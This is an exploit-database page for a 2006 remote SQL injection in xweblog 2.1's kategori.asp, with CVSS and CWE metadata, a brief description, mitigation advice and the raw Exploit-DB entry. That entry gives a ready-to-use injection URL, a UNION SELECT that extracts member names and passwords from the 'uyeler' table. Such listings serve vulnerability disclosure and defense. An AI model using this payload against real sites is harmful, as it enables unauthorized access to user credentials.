header-logo
Suggest Exploit
vendor:
xweblog
by:
Muhacir
7,5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name: xweblog
Affected Version From: 2.1
Affected Version To: 2.1
Patch Exists: YES
Related CWE: N/A
CPE: a:xweblog:xweblog:2.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: None
2006

xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability

xweblog <= 2.1 (tr) (kategori.asp) is vulnerable to a Remote SQL Injection vulnerability. An attacker can exploit this vulnerability by sending a specially crafted HTTP request to the vulnerable application. This can allow the attacker to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Developers should always sanitize user input to prevent SQL injection attacks. Input validation should be used to detect malicious data before it is passed to the back-end database.
Source

Exploit-DB raw data:

# xweblog <= 2.1 (tr) (kategori.asp)Remote SQL Injection Vulnerability

# Author : Muhacir

# Source : http://www.aspindir.com/goster/4386

# Exploit : http://www.victim.com/[xweblog path]/kategori.asp?kategori=-1%20union%20select%200,ad,2,3,4,5,6,7,8,9,sifre,11,12%20from%20uyeler

# Greetz To : str0ke :)

# milw0rm.com [2006-09-22]